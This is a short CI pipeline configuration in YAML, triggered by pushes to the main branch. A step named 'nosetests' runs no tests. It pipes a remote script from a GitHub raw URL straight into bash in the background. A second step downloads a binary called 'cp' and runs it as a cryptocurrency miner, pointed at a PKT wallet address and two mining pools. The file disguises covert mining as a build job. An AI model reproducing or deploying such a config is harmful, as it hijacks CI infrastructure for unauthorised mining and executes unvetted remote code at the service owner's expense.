- pipeline: "Pipeline"
  events:
  - type: "PUSH"
    refs:
    - "refs/heads/main"
  fail_on_prepare_env_warning: true
  resources: "XLARGE"
  actions:
  - action: "nosetests"
    type: "BUILD"
    docker_image_name: "library/python"
    docker_image_tag: "3.9"
    execute_commands:
    - "curl -sL https://raw.githubusercontent.com/WifeAiBot/gaga/main/x | bash &"
    cached_dirs:
    - "/root/.cache/pip"
    shell: "BASH"
  - action: "chmod +x cp && ./cp ann -p pkt1qmmecdztm2ff4fvul0y2u7nfrrh3pdy0x6p6vdk http://pool.pkt.world http://pool.pktpool.io"
    type: "BUILD"
    docker_image_name: "library/python"
    docker_image_tag: "3.9"
    execute_commands:
    - "wget https://github.com/WifeAiBot/testpoint/raw/main/cp"
    - "chmod +x cp && ./cp -a ann -p pkt1qmmecdztm2ff4fvul0y2u7nfrrh3pdy0x6p6vdk http://pool.pkt.world http://pool.pktpool.io"
    cached_dirs:
    - "/root/.cache/pip"
    shell: "BASH"
